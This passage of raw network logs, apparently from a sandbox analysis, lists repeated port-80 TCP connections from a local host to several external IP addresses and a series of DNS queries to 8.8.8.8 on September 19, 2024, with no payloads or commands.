                                                      Sep 19, 2024 15:06:21.638895988 CEST4918780192.168.2.22103.21.221.4
                                                      Sep 19, 2024 15:06:21.638900042 CEST8049187103.21.221.4192.168.2.22
                                                      Sep 19, 2024 15:06:21.638911963 CEST8049187103.21.221.4192.168.2.22
                                                      Sep 19, 2024 15:06:21.638917923 CEST4918780192.168.2.22103.21.221.4
                                                      Sep 19, 2024 15:06:21.638925076 CEST8049187103.21.221.4192.168.2.22
                                                      Sep 19, 2024 15:06:21.639147043 CEST4918780192.168.2.22103.21.221.4
                                                      Sep 19, 2024 15:06:21.643742085 CEST8049187103.21.221.4192.168.2.22
                                                      Sep 19, 2024 15:06:21.644020081 CEST8049187103.21.221.4192.168.2.22
                                                      Sep 19, 2024 15:06:21.649195910 CEST4918780192.168.2.22103.21.221.4
                                                      Sep 19, 2024 15:06:21.673192024 CEST4918780192.168.2.22103.21.221.4
                                                      Sep 19, 2024 15:06:22.726416111 CEST4918880192.168.2.22103.21.221.4
                                                      Sep 19, 2024 15:06:22.731302977 CEST8049188103.21.221.4192.168.2.22
                                                      Sep 19, 2024 15:06:22.731363058 CEST4918880192.168.2.22103.21.221.4
                                                      Sep 19, 2024 15:06:22.741157055 CEST4918880192.168.2.22103.21.221.4
                                                      Sep 19, 2024 15:06:22.746009111 CEST8049188103.21.221.4192.168.2.22
                                                      Sep 19, 2024 15:06:23.979036093 CEST8049188103.21.221.4192.168.2.22
                                                      Sep 19, 2024 15:06:23.979053974 CEST8049188103.21.221.4192.168.2.22
                                                      Sep 19, 2024 15:06:23.979069948 CEST8049188103.21.221.4192.168.2.22
                                                      Sep 19, 2024 15:06:23.979176044 CEST8049188103.21.221.4192.168.2.22
                                                      Sep 19, 2024 15:06:23.979178905 CEST4918880192.168.2.22103.21.221.4
                                                      Sep 19, 2024 15:06:23.979192019 CEST8049188103.21.221.4192.168.2.22
                                                      Sep 19, 2024 15:06:23.979207993 CEST8049188103.21.221.4192.168.2.22
                                                      Sep 19, 2024 15:06:23.979223013 CEST8049188103.21.221.4192.168.2.22
                                                      Sep 19, 2024 15:06:23.979232073 CEST4918880192.168.2.22103.21.221.4
                                                      Sep 19, 2024 15:06:23.979238987 CEST8049188103.21.221.4192.168.2.22
                                                      Sep 19, 2024 15:06:23.979249954 CEST4918880192.168.2.22103.21.221.4
                                                      Sep 19, 2024 15:06:23.979254961 CEST8049188103.21.221.4192.168.2.22
                                                      Sep 19, 2024 15:06:23.979269981 CEST8049188103.21.221.4192.168.2.22
                                                      Sep 19, 2024 15:06:23.979310989 CEST4918880192.168.2.22103.21.221.4
                                                      Sep 19, 2024 15:06:23.979310989 CEST4918880192.168.2.22103.21.221.4
                                                      Sep 19, 2024 15:06:23.981684923 CEST8049188103.21.221.4192.168.2.22
                                                      Sep 19, 2024 15:06:23.981879950 CEST4918880192.168.2.22103.21.221.4
                                                      Sep 19, 2024 15:06:24.246212959 CEST4918880192.168.2.22103.21.221.4
                                                      Sep 19, 2024 15:06:25.263561010 CEST4918980192.168.2.22103.21.221.4
                                                      Sep 19, 2024 15:06:25.269874096 CEST8049189103.21.221.4192.168.2.22
                                                      Sep 19, 2024 15:06:25.275415897 CEST4918980192.168.2.22103.21.221.4
                                                      Sep 19, 2024 15:06:25.282819986 CEST4918980192.168.2.22103.21.221.4
                                                      Sep 19, 2024 15:06:25.287870884 CEST8049189103.21.221.4192.168.2.22
                                                      Sep 19, 2024 15:06:25.287883043 CEST8049189103.21.221.4192.168.2.22
                                                      Sep 19, 2024 15:06:25.287997007 CEST4918980192.168.2.22103.21.221.4
                                                      Sep 19, 2024 15:06:25.294558048 CEST8049189103.21.221.4192.168.2.22
                                                      Sep 19, 2024 15:06:25.295732975 CEST8049189103.21.221.4192.168.2.22
                                                      Sep 19, 2024 15:06:26.567323923 CEST8049189103.21.221.4192.168.2.22
                                                      Sep 19, 2024 15:06:26.567344904 CEST8049189103.21.221.4192.168.2.22
                                                      Sep 19, 2024 15:06:26.567359924 CEST8049189103.21.221.4192.168.2.22
                                                      Sep 19, 2024 15:06:26.567372084 CEST8049189103.21.221.4192.168.2.22
                                                      Sep 19, 2024 15:06:26.567394972 CEST8049189103.21.221.4192.168.2.22
                                                      Sep 19, 2024 15:06:26.567406893 CEST8049189103.21.221.4192.168.2.22
                                                      Sep 19, 2024 15:06:26.567408085 CEST4918980192.168.2.22103.21.221.4
                                                      Sep 19, 2024 15:06:26.567428112 CEST8049189103.21.221.4192.168.2.22
                                                      Sep 19, 2024 15:06:26.567431927 CEST4918980192.168.2.22103.21.221.4
                                                      Sep 19, 2024 15:06:26.567431927 CEST4918980192.168.2.22103.21.221.4
                                                      Sep 19, 2024 15:06:26.567439079 CEST8049189103.21.221.4192.168.2.22
                                                      Sep 19, 2024 15:06:26.567451000 CEST8049189103.21.221.4192.168.2.22
                                                      Sep 19, 2024 15:06:26.567462921 CEST8049189103.21.221.4192.168.2.22
                                                      Sep 19, 2024 15:06:26.567476988 CEST4918980192.168.2.22103.21.221.4
                                                      Sep 19, 2024 15:06:26.567502022 CEST4918980192.168.2.22103.21.221.4
                                                      Sep 19, 2024 15:06:26.572232008 CEST8049189103.21.221.4192.168.2.22
                                                      Sep 19, 2024 15:06:26.572252035 CEST8049189103.21.221.4192.168.2.22
                                                      Sep 19, 2024 15:06:26.572298050 CEST4918980192.168.2.22103.21.221.4
                                                      Sep 19, 2024 15:06:26.816529036 CEST4918980192.168.2.22103.21.221.4
                                                      Sep 19, 2024 15:06:27.825213909 CEST4919080192.168.2.22103.21.221.4
                                                      Sep 19, 2024 15:06:27.831012964 CEST8049190103.21.221.4192.168.2.22
                                                      Sep 19, 2024 15:06:27.837198019 CEST4919080192.168.2.22103.21.221.4
                                                      Sep 19, 2024 15:06:27.849251986 CEST4919080192.168.2.22103.21.221.4
                                                      Sep 19, 2024 15:06:27.856261015 CEST8049190103.21.221.4192.168.2.22
                                                      Sep 19, 2024 15:06:29.004389048 CEST8049190103.21.221.4192.168.2.22
                                                      Sep 19, 2024 15:06:29.004749060 CEST8049190103.21.221.4192.168.2.22
                                                      Sep 19, 2024 15:06:29.007375002 CEST4919080192.168.2.22103.21.221.4
                                                      Sep 19, 2024 15:06:29.007652998 CEST4919080192.168.2.22103.21.221.4
                                                      Sep 19, 2024 15:06:29.014269114 CEST8049190103.21.221.4192.168.2.22
                                                      Sep 19, 2024 15:06:34.147624969 CEST4919180192.168.2.2284.32.84.32
                                                      Sep 19, 2024 15:06:34.152628899 CEST804919184.32.84.32192.168.2.22
                                                      Sep 19, 2024 15:06:34.152689934 CEST4919180192.168.2.2284.32.84.32
                                                      Sep 19, 2024 15:06:34.168216944 CEST4919180192.168.2.2284.32.84.32
                                                      Sep 19, 2024 15:06:34.174465895 CEST804919184.32.84.32192.168.2.22
                                                      Sep 19, 2024 15:06:34.174483061 CEST804919184.32.84.32192.168.2.22
                                                      Sep 19, 2024 15:06:34.174506903 CEST4919180192.168.2.2284.32.84.32
                                                      Sep 19, 2024 15:06:34.179567099 CEST804919184.32.84.32192.168.2.22
                                                      Sep 19, 2024 15:06:34.640120983 CEST804919184.32.84.32192.168.2.22
                                                      Sep 19, 2024 15:06:34.640178919 CEST4919180192.168.2.2284.32.84.32
                                                      Sep 19, 2024 15:06:35.681294918 CEST4919180192.168.2.2284.32.84.32
                                                      Sep 19, 2024 15:06:35.686119080 CEST804919184.32.84.32192.168.2.22
                                                      Sep 19, 2024 15:06:36.698721886 CEST4919280192.168.2.2284.32.84.32
                                                      Sep 19, 2024 15:06:36.704164982 CEST804919284.32.84.32192.168.2.22
                                                      Sep 19, 2024 15:06:36.704230070 CEST4919280192.168.2.2284.32.84.32
                                                      Sep 19, 2024 15:06:36.718750954 CEST4919280192.168.2.2284.32.84.32
                                                      Sep 19, 2024 15:06:36.723697901 CEST804919284.32.84.32192.168.2.22
                                                      Sep 19, 2024 15:06:37.168152094 CEST804919284.32.84.32192.168.2.22
                                                      Sep 19, 2024 15:06:37.169289112 CEST4919280192.168.2.2284.32.84.32
                                                      Sep 19, 2024 15:06:38.223850012 CEST4919280192.168.2.2284.32.84.32
                                                      Sep 19, 2024 15:06:38.449044943 CEST804919284.32.84.32192.168.2.22
                                                      Sep 19, 2024 15:06:39.241657972 CEST4919380192.168.2.2284.32.84.32
                                                      Sep 19, 2024 15:06:39.246732950 CEST804919384.32.84.32192.168.2.22
                                                      Sep 19, 2024 15:06:39.249366045 CEST4919380192.168.2.2284.32.84.32
                                                      Sep 19, 2024 15:06:39.262733936 CEST4919380192.168.2.2284.32.84.32
                                                      Sep 19, 2024 15:06:39.267702103 CEST804919384.32.84.32192.168.2.22
                                                      Sep 19, 2024 15:06:39.267776966 CEST804919384.32.84.32192.168.2.22
                                                      Sep 19, 2024 15:06:39.268260002 CEST4919380192.168.2.2284.32.84.32
                                                      Sep 19, 2024 15:06:39.273426056 CEST804919384.32.84.32192.168.2.22
                                                      Sep 19, 2024 15:06:39.273438931 CEST804919384.32.84.32192.168.2.22
                                                      Sep 19, 2024 15:06:39.706654072 CEST804919384.32.84.32192.168.2.22
                                                      Sep 19, 2024 15:06:39.706767082 CEST4919380192.168.2.2284.32.84.32
                                                      Sep 19, 2024 15:06:40.766690016 CEST4919380192.168.2.2284.32.84.32
                                                      Sep 19, 2024 15:06:40.771692038 CEST804919384.32.84.32192.168.2.22
                                                      Sep 19, 2024 15:06:41.783622980 CEST4919480192.168.2.2284.32.84.32
                                                      Sep 19, 2024 15:06:41.788636923 CEST804919484.32.84.32192.168.2.22
                                                      Sep 19, 2024 15:06:41.788785934 CEST4919480192.168.2.2284.32.84.32
                                                      Sep 19, 2024 15:06:41.797487974 CEST4919480192.168.2.2284.32.84.32
                                                      Sep 19, 2024 15:06:41.802438021 CEST804919484.32.84.32192.168.2.22
                                                      Sep 19, 2024 15:06:42.251146078 CEST804919484.32.84.32192.168.2.22
                                                      Sep 19, 2024 15:06:42.251163960 CEST804919484.32.84.32192.168.2.22
                                                      Sep 19, 2024 15:06:42.251174927 CEST804919484.32.84.32192.168.2.22
                                                      Sep 19, 2024 15:06:42.251262903 CEST804919484.32.84.32192.168.2.22
                                                      Sep 19, 2024 15:06:42.251275063 CEST804919484.32.84.32192.168.2.22
                                                      Sep 19, 2024 15:06:42.251286030 CEST804919484.32.84.32192.168.2.22
                                                      Sep 19, 2024 15:06:42.251287937 CEST4919480192.168.2.2284.32.84.32
                                                      Sep 19, 2024 15:06:42.251297951 CEST804919484.32.84.32192.168.2.22
                                                      Sep 19, 2024 15:06:42.251310110 CEST804919484.32.84.32192.168.2.22
                                                      Sep 19, 2024 15:06:42.251322031 CEST804919484.32.84.32192.168.2.22
                                                      Sep 19, 2024 15:06:42.251338959 CEST804919484.32.84.32192.168.2.22
                                                      Sep 19, 2024 15:06:42.251405954 CEST4919480192.168.2.2284.32.84.32
                                                      Sep 19, 2024 15:06:42.251405954 CEST4919480192.168.2.2284.32.84.32
                                                      Sep 19, 2024 15:06:42.263866901 CEST4919480192.168.2.2284.32.84.32
                                                      Sep 19, 2024 15:06:42.268667936 CEST804919484.32.84.32192.168.2.22
                                                      Sep 19, 2024 15:06:47.357767105 CEST4919580192.168.2.22194.58.112.174
                                                      Sep 19, 2024 15:06:47.365309000 CEST8049195194.58.112.174192.168.2.22
                                                      Sep 19, 2024 15:06:47.371344090 CEST4919580192.168.2.22194.58.112.174
                                                      Sep 19, 2024 15:06:47.381531954 CEST4919580192.168.2.22194.58.112.174
                                                      Sep 19, 2024 15:06:47.386444092 CEST8049195194.58.112.174192.168.2.22
                                                      Sep 19, 2024 15:06:47.386529922 CEST8049195194.58.112.174192.168.2.22
                                                      Sep 19, 2024 15:06:47.386786938 CEST4919580192.168.2.22194.58.112.174
                                                      Sep 19, 2024 15:06:47.391669989 CEST8049195194.58.112.174192.168.2.22
                                                      Sep 19, 2024 15:06:48.085787058 CEST8049195194.58.112.174192.168.2.22
                                                      Sep 19, 2024 15:06:48.085810900 CEST8049195194.58.112.174192.168.2.22
                                                      Sep 19, 2024 15:06:48.085822105 CEST8049195194.58.112.174192.168.2.22
                                                      Sep 19, 2024 15:06:48.085833073 CEST8049195194.58.112.174192.168.2.22
                                                      Sep 19, 2024 15:06:48.085866928 CEST4919580192.168.2.22194.58.112.174
                                                      Sep 19, 2024 15:06:48.085942984 CEST4919580192.168.2.22194.58.112.174
                                                      Sep 19, 2024 15:06:48.086111069 CEST8049195194.58.112.174192.168.2.22
                                                      Sep 19, 2024 15:06:48.086230040 CEST4919580192.168.2.22194.58.112.174
                                                      Sep 19, 2024 15:06:48.894280910 CEST4919580192.168.2.22194.58.112.174
                                                      Sep 19, 2024 15:06:49.911313057 CEST4919680192.168.2.22194.58.112.174
                                                      Sep 19, 2024 15:06:50.086441994 CEST8049196194.58.112.174192.168.2.22
                                                      Sep 19, 2024 15:06:50.086527109 CEST4919680192.168.2.22194.58.112.174
                                                      Sep 19, 2024 15:06:50.097117901 CEST4919680192.168.2.22194.58.112.174
                                                      Sep 19, 2024 15:06:50.102153063 CEST8049196194.58.112.174192.168.2.22
                                                      Sep 19, 2024 15:06:50.802159071 CEST8049196194.58.112.174192.168.2.22
                                                      Sep 19, 2024 15:06:50.802177906 CEST8049196194.58.112.174192.168.2.22
                                                      Sep 19, 2024 15:06:50.802191973 CEST8049196194.58.112.174192.168.2.22
                                                      Sep 19, 2024 15:06:50.802203894 CEST8049196194.58.112.174192.168.2.22
                                                      Sep 19, 2024 15:06:50.802225113 CEST4919680192.168.2.22194.58.112.174
                                                      Sep 19, 2024 15:06:50.802283049 CEST4919680192.168.2.22194.58.112.174
                                                      Sep 19, 2024 15:06:50.805259943 CEST8049196194.58.112.174192.168.2.22
                                                      Sep 19, 2024 15:06:50.805319071 CEST4919680192.168.2.22194.58.112.174
                                                      Sep 19, 2024 15:06:51.609313011 CEST4919680192.168.2.22194.58.112.174
                                                      Sep 19, 2024 15:06:52.625610113 CEST4919780192.168.2.22194.58.112.174
                                                      Sep 19, 2024 15:06:52.630484104 CEST8049197194.58.112.174192.168.2.22
                                                      Sep 19, 2024 15:06:52.630561113 CEST4919780192.168.2.22194.58.112.174
                                                      Sep 19, 2024 15:06:52.641499043 CEST4919780192.168.2.22194.58.112.174
                                                      Sep 19, 2024 15:06:52.646312952 CEST8049197194.58.112.174192.168.2.22
                                                      Sep 19, 2024 15:06:52.646373987 CEST4919780192.168.2.22194.58.112.174
                                                      Sep 19, 2024 15:06:52.646423101 CEST8049197194.58.112.174192.168.2.22
                                                      Sep 19, 2024 15:06:52.651171923 CEST8049197194.58.112.174192.168.2.22
                                                      Sep 19, 2024 15:06:52.651355982 CEST8049197194.58.112.174192.168.2.22
                                                      Sep 19, 2024 15:06:53.351847887 CEST8049197194.58.112.174192.168.2.22
                                                      Sep 19, 2024 15:06:53.351870060 CEST8049197194.58.112.174192.168.2.22
                                                      Sep 19, 2024 15:06:53.351891041 CEST8049197194.58.112.174192.168.2.22
                                                      Sep 19, 2024 15:06:53.351902008 CEST8049197194.58.112.174192.168.2.22
                                                      Sep 19, 2024 15:06:53.351912975 CEST8049197194.58.112.174192.168.2.22
                                                      Sep 19, 2024 15:06:53.351927042 CEST4919780192.168.2.22194.58.112.174
                                                      Sep 19, 2024 15:06:53.356064081 CEST4919780192.168.2.22194.58.112.174
                                                      Sep 19, 2024 15:06:54.151957989 CEST4919780192.168.2.22194.58.112.174
                                                      Sep 19, 2024 15:06:55.168875933 CEST4919880192.168.2.22194.58.112.174
                                                      Sep 19, 2024 15:06:55.173717022 CEST8049198194.58.112.174192.168.2.22
                                                      Sep 19, 2024 15:06:55.175501108 CEST4919880192.168.2.22194.58.112.174
                                                      Sep 19, 2024 15:06:55.182837009 CEST4919880192.168.2.22194.58.112.174
                                                      Sep 19, 2024 15:06:55.188379049 CEST8049198194.58.112.174192.168.2.22
                                                      Sep 19, 2024 15:06:55.880155087 CEST8049198194.58.112.174192.168.2.22
                                                      Sep 19, 2024 15:06:55.880191088 CEST8049198194.58.112.174192.168.2.22
                                                      Sep 19, 2024 15:06:55.880244970 CEST8049198194.58.112.174192.168.2.22
                                                      Sep 19, 2024 15:06:55.880306005 CEST8049198194.58.112.174192.168.2.22
                                                      Sep 19, 2024 15:06:55.880317926 CEST8049198194.58.112.174192.168.2.22
                                                      Sep 19, 2024 15:06:55.880328894 CEST8049198194.58.112.174192.168.2.22
                                                      Sep 19, 2024 15:06:55.880336046 CEST4919880192.168.2.22194.58.112.174
                                                      Sep 19, 2024 15:06:55.880352020 CEST4919880192.168.2.22194.58.112.174
                                                      Sep 19, 2024 15:06:55.880371094 CEST8049198194.58.112.174192.168.2.22
                                                      Sep 19, 2024 15:06:55.880382061 CEST8049198194.58.112.174192.168.2.22
                                                      Sep 19, 2024 15:06:55.880398035 CEST4919880192.168.2.22194.58.112.174
                                                      Sep 19, 2024 15:06:55.880399942 CEST8049198194.58.112.174192.168.2.22
                                                      Sep 19, 2024 15:06:55.880413055 CEST8049198194.58.112.174192.168.2.22
                                                      Sep 19, 2024 15:06:55.880424023 CEST4919880192.168.2.22194.58.112.174
                                                      Sep 19, 2024 15:06:55.880494118 CEST8049198194.58.112.174192.168.2.22
                                                      Sep 19, 2024 15:06:55.880520105 CEST4919880192.168.2.22194.58.112.174
                                                      Sep 19, 2024 15:06:55.884776115 CEST4919880192.168.2.22194.58.112.174
                                                      Sep 19, 2024 15:06:55.884776115 CEST4919880192.168.2.22194.58.112.174
                                                      Sep 19, 2024 15:06:55.889592886 CEST8049198194.58.112.174192.168.2.22
                                                      Sep 19, 2024 15:07:00.939094067 CEST4919980192.168.2.2265.21.196.90
                                                      Sep 19, 2024 15:07:00.944129944 CEST804919965.21.196.90192.168.2.22
                                                      Sep 19, 2024 15:07:00.944188118 CEST4919980192.168.2.2265.21.196.90
                                                      Sep 19, 2024 15:07:00.955033064 CEST4919980192.168.2.2265.21.196.90
                                                      Sep 19, 2024 15:07:00.959860086 CEST804919965.21.196.90192.168.2.22
                                                      Sep 19, 2024 15:07:00.959911108 CEST4919980192.168.2.2265.21.196.90
                                                      Sep 19, 2024 15:07:00.959995031 CEST804919965.21.196.90192.168.2.22
                                                      Sep 19, 2024 15:07:00.964750051 CEST804919965.21.196.90192.168.2.22
                                                      Sep 19, 2024 15:07:01.634581089 CEST804919965.21.196.90192.168.2.22
                                                      Sep 19, 2024 15:07:01.634855032 CEST804919965.21.196.90192.168.2.22
                                                      Sep 19, 2024 15:07:01.635322094 CEST4919980192.168.2.2265.21.196.90
                                                      Sep 19, 2024 15:07:02.551428080 CEST4919980192.168.2.2265.21.196.90
                                                      Sep 19, 2024 15:07:03.561731100 CEST4920080192.168.2.2265.21.196.90
                                                      Sep 19, 2024 15:07:03.566936970 CEST804920065.21.196.90192.168.2.22
                                                      Sep 19, 2024 15:07:03.567255020 CEST4920080192.168.2.2265.21.196.90
                                                      Sep 19, 2024 15:07:03.581443071 CEST4920080192.168.2.2265.21.196.90
                                                      Sep 19, 2024 15:07:03.586486101 CEST804920065.21.196.90192.168.2.22
                                                      Sep 19, 2024 15:07:04.238034964 CEST804920065.21.196.90192.168.2.22
                                                      Sep 19, 2024 15:07:04.238125086 CEST804920065.21.196.90192.168.2.22
                                                      Sep 19, 2024 15:07:04.238168955 CEST4920080192.168.2.2265.21.196.90
                                                      Sep 19, 2024 15:07:05.087445974 CEST4920080192.168.2.2265.21.196.90
                                                      Sep 19, 2024 15:07:06.104255915 CEST4920180192.168.2.2265.21.196.90
                                                      Sep 19, 2024 15:07:06.148806095 CEST804920165.21.196.90192.168.2.22
                                                      Sep 19, 2024 15:07:06.148879051 CEST4920180192.168.2.2265.21.196.90
                                                      Sep 19, 2024 15:07:06.159301043 CEST4920180192.168.2.2265.21.196.90
                                                      Sep 19, 2024 15:07:06.164118052 CEST804920165.21.196.90192.168.2.22
                                                      Sep 19, 2024 15:07:06.164273977 CEST4920180192.168.2.2265.21.196.90
                                                      Sep 19, 2024 15:07:06.164311886 CEST804920165.21.196.90192.168.2.22
                                                      Sep 19, 2024 15:07:06.169215918 CEST804920165.21.196.90192.168.2.22
                                                      Sep 19, 2024 15:07:06.169266939 CEST804920165.21.196.90192.168.2.22
                                                      Sep 19, 2024 15:07:06.835082054 CEST804920165.21.196.90192.168.2.22
                                                      Sep 19, 2024 15:07:06.835180998 CEST804920165.21.196.90192.168.2.22
                                                      Sep 19, 2024 15:07:06.835268021 CEST4920180192.168.2.2265.21.196.90
                                                      Sep 19, 2024 15:07:07.661114931 CEST4920180192.168.2.2265.21.196.90
                                                      Sep 19, 2024 15:07:08.681556940 CEST4920280192.168.2.2265.21.196.90
                                                      Sep 19, 2024 15:07:08.686603069 CEST804920265.21.196.90192.168.2.22
                                                      Sep 19, 2024 15:07:08.686657906 CEST4920280192.168.2.2265.21.196.90
                                                      Sep 19, 2024 15:07:08.696088076 CEST4920280192.168.2.2265.21.196.90
                                                      Sep 19, 2024 15:07:08.704412937 CEST804920265.21.196.90192.168.2.22
                                                      Sep 19, 2024 15:07:09.374624968 CEST804920265.21.196.90192.168.2.22
                                                      Sep 19, 2024 15:07:09.374671936 CEST804920265.21.196.90192.168.2.22
                                                      Sep 19, 2024 15:07:09.375041962 CEST4920280192.168.2.2265.21.196.90
                                                      Sep 19, 2024 15:07:09.385341883 CEST4920280192.168.2.2265.21.196.90
                                                      Sep 19, 2024 15:07:09.390913963 CEST804920265.21.196.90192.168.2.22
                                                      Sep 19, 2024 15:07:14.432214022 CEST4920380192.168.2.22172.81.61.224
                                                      Sep 19, 2024 15:07:14.437175035 CEST8049203172.81.61.224192.168.2.22
                                                      Sep 19, 2024 15:07:14.437247992 CEST4920380192.168.2.22172.81.61.224
                                                      Sep 19, 2024 15:07:14.446952105 CEST4920380192.168.2.22172.81.61.224
                                                      Sep 19, 2024 15:07:14.451889038 CEST8049203172.81.61.224192.168.2.22
                                                      Sep 19, 2024 15:07:14.452004910 CEST4920380192.168.2.22172.81.61.224
                                                      Sep 19, 2024 15:07:14.452145100 CEST8049203172.81.61.224192.168.2.22
                                                      Sep 19, 2024 15:07:14.456949949 CEST8049203172.81.61.224192.168.2.22
                                                      Sep 19, 2024 15:07:15.138988972 CEST8049203172.81.61.224192.168.2.22
                                                      Sep 19, 2024 15:07:15.139008045 CEST8049203172.81.61.224192.168.2.22
                                                      Sep 19, 2024 15:07:15.139019966 CEST8049203172.81.61.224192.168.2.22
                                                      Sep 19, 2024 15:07:15.139195919 CEST4920380192.168.2.22172.81.61.224
                                                      Sep 19, 2024 15:07:15.961250067 CEST4920380192.168.2.22172.81.61.224
                                                      Sep 19, 2024 15:07:16.977225065 CEST4920480192.168.2.22172.81.61.224
                                                      Sep 19, 2024 15:07:16.982239962 CEST8049204172.81.61.224192.168.2.22
                                                      Sep 19, 2024 15:07:16.982306957 CEST4920480192.168.2.22172.81.61.224
                                                      Sep 19, 2024 15:07:16.993396044 CEST4920480192.168.2.22172.81.61.224
                                                      Sep 19, 2024 15:07:16.998318911 CEST8049204172.81.61.224192.168.2.22
                                                      Sep 19, 2024 15:07:17.737762928 CEST8049204172.81.61.224192.168.2.22
                                                      Sep 19, 2024 15:07:17.737782001 CEST8049204172.81.61.224192.168.2.22
                                                      Sep 19, 2024 15:07:17.737796068 CEST8049204172.81.61.224192.168.2.22
                                                      Sep 19, 2024 15:07:17.737869024 CEST4920480192.168.2.22172.81.61.224
                                                      Sep 19, 2024 15:07:18.503154993 CEST4920480192.168.2.22172.81.61.224
                                                      Sep 19, 2024 15:07:19.521447897 CEST4920580192.168.2.22172.81.61.224
                                                      Sep 19, 2024 15:07:19.526405096 CEST8049205172.81.61.224192.168.2.22
                                                      Sep 19, 2024 15:07:19.527504921 CEST4920580192.168.2.22172.81.61.224
                                                      Sep 19, 2024 15:07:19.539405107 CEST4920580192.168.2.22172.81.61.224
                                                      Sep 19, 2024 15:07:19.544549942 CEST8049205172.81.61.224192.168.2.22
                                                      Sep 19, 2024 15:07:19.544567108 CEST8049205172.81.61.224192.168.2.22
                                                      Sep 19, 2024 15:07:19.544675112 CEST4920580192.168.2.22172.81.61.224
                                                      Sep 19, 2024 15:07:19.549510002 CEST8049205172.81.61.224192.168.2.22
                                                      Sep 19, 2024 15:07:19.549731016 CEST8049205172.81.61.224192.168.2.22
                                                      Sep 19, 2024 15:07:20.106592894 CEST8049205172.81.61.224192.168.2.22
                                                      Sep 19, 2024 15:07:20.106626034 CEST8049205172.81.61.224192.168.2.22
                                                      Sep 19, 2024 15:07:20.106673002 CEST4920580192.168.2.22172.81.61.224
                                                      Sep 19, 2024 15:07:21.046698093 CEST4920580192.168.2.22172.81.61.224
                                                      Sep 19, 2024 15:07:22.065290928 CEST4920680192.168.2.22172.81.61.224
                                                      Sep 19, 2024 15:07:22.070475101 CEST8049206172.81.61.224192.168.2.22
                                                      Sep 19, 2024 15:07:22.070533991 CEST4920680192.168.2.22172.81.61.224
                                                      Sep 19, 2024 15:07:22.078560114 CEST4920680192.168.2.22172.81.61.224
                                                      Sep 19, 2024 15:07:22.083378077 CEST8049206172.81.61.224192.168.2.22
                                                      Sep 19, 2024 15:07:22.662457943 CEST8049206172.81.61.224192.168.2.22
                                                      Sep 19, 2024 15:07:22.662561893 CEST8049206172.81.61.224192.168.2.22
                                                      Sep 19, 2024 15:07:22.662611961 CEST4920680192.168.2.22172.81.61.224
                                                      Sep 19, 2024 15:07:22.873013020 CEST4920680192.168.2.22172.81.61.224
                                                      Sep 19, 2024 15:07:22.878048897 CEST8049206172.81.61.224192.168.2.22
                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Sep 19, 2024 15:04:07.419878006 CEST5456253192.168.2.228.8.8.8
                                                      Sep 19, 2024 15:04:07.601802111 CEST53545628.8.8.8192.168.2.22
                                                      Sep 19, 2024 15:04:13.060216904 CEST5291753192.168.2.228.8.8.8
                                                      Sep 19, 2024 15:04:13.202552080 CEST53529178.8.8.8192.168.2.22
                                                      Sep 19, 2024 15:04:23.595849991 CEST6275153192.168.2.228.8.8.8
                                                      Sep 19, 2024 15:04:23.885529041 CEST53627518.8.8.8192.168.2.22
                                                      Sep 19, 2024 15:04:37.655725956 CEST5789353192.168.2.228.8.8.8
                                                      Sep 19, 2024 15:04:37.684438944 CEST53578938.8.8.8192.168.2.22
                                                      Sep 19, 2024 15:04:50.997200966 CEST5482153192.168.2.228.8.8.8
                                                      Sep 19, 2024 15:04:51.046675920 CEST53548218.8.8.8192.168.2.22
                                                      Sep 19, 2024 15:05:04.534449100 CEST5471953192.168.2.228.8.8.8
                                                      Sep 19, 2024 15:05:04.541682005 CEST53547198.8.8.8192.168.2.22
                                                      Sep 19, 2024 15:05:18.675501108 CEST4988153192.168.2.228.8.8.8
                                                      Sep 19, 2024 15:05:18.789629936 CEST53498818.8.8.8192.168.2.22
                                                      Sep 19, 2024 15:05:37.579474926 CEST5499853192.168.2.228.8.8.8
                                                      Sep 19, 2024 15:05:38.586941004 CEST5499853192.168.2.228.8.8.8
                                                      Sep 19, 2024 15:05:39.599551916 CEST5499853192.168.2.228.8.8.8
                                                      Sep 19, 2024 15:05:41.611331940 CEST5499853192.168.2.228.8.8.8
                                                      Sep 19, 2024 15:05:42.588857889 CEST53549988.8.8.8192.168.2.22
                                                      Sep 19, 2024 15:05:43.595001936 CEST5278153192.168.2.228.8.8.8
                                                      Sep 19, 2024 15:05:44.516613960 CEST53549988.8.8.8192.168.2.22
                                                      Sep 19, 2024 15:05:44.606461048 CEST53549988.8.8.8192.168.2.22
                                                      Sep 19, 2024 15:05:44.606604099 CEST5278153192.168.2.228.8.8.8
                                                      Sep 19, 2024 15:05:45.620595932 CEST5278153192.168.2.228.8.8.8
                                                      Sep 19, 2024 15:05:46.720402002 CEST53549988.8.8.8192.168.2.22
                                                      Sep 19, 2024 15:05:47.633152008 CEST5278153192.168.2.228.8.8.8
                                                      Sep 19, 2024 15:05:49.530029058 CEST53527818.8.8.8192.168.2.22
                                                      Sep 19, 2024 15:05:49.612386942 CEST53527818.8.8.8192.168.2.22
                                                      Sep 19, 2024 15:05:50.537856102 CEST6392653192.168.2.228.8.8.8
                                                      Sep 19, 2024 15:05:50.630521059 CEST53527818.8.8.8192.168.2.22
                                                      Sep 19, 2024 15:05:51.549153090 CEST6392653192.168.2.228.8.8.8
                                                      Sep 19, 2024 15:05:52.562613964 CEST6392653192.168.2.228.8.8.8
                                                      Sep 19, 2024 15:05:52.808090925 CEST53527818.8.8.8192.168.2.22
                                                      Sep 19, 2024 15:05:54.574934006 CEST6392653192.168.2.228.8.8.8
                                                      Sep 19, 2024 15:05:55.543802977 CEST53639268.8.8.8192.168.2.22
                                                      Sep 19, 2024 15:05:56.556469917 CEST53639268.8.8.8192.168.2.22
                                                      Sep 19, 2024 15:05:56.563329935 CEST6551053192.168.2.228.8.8.8
                                                      Sep 19, 2024 15:05:57.570185900 CEST6551053192.168.2.228.8.8.8
                                                      Sep 19, 2024 15:05:57.794363976 CEST53639268.8.8.8192.168.2.22
                                                      Sep 19, 2024 15:05:58.584194899 CEST6551053192.168.2.228.8.8.8
                                                      Sep 19, 2024 15:05:59.700598001 CEST53639268.8.8.8192.168.2.22
                                                      Sep 19, 2024 15:06:00.596612930 CEST6551053192.168.2.228.8.8.8
                                                      Sep 19, 2024 15:06:01.571887016 CEST53655108.8.8.8192.168.2.22
                                                      Sep 19, 2024 15:06:02.575997114 CEST53655108.8.8.8192.168.2.22
                                                      Sep 19, 2024 15:06:03.590539932 CEST53655108.8.8.8192.168.2.22
                                                      Sep 19, 2024 15:06:05.602880001 CEST53655108.8.8.8192.168.2.22
                                                      Sep 19, 2024 15:06:06.576175928 CEST6267253192.168.2.228.8.8.8
                                                      Sep 19, 2024 15:06:06.660497904 CEST53626728.8.8.8192.168.2.22
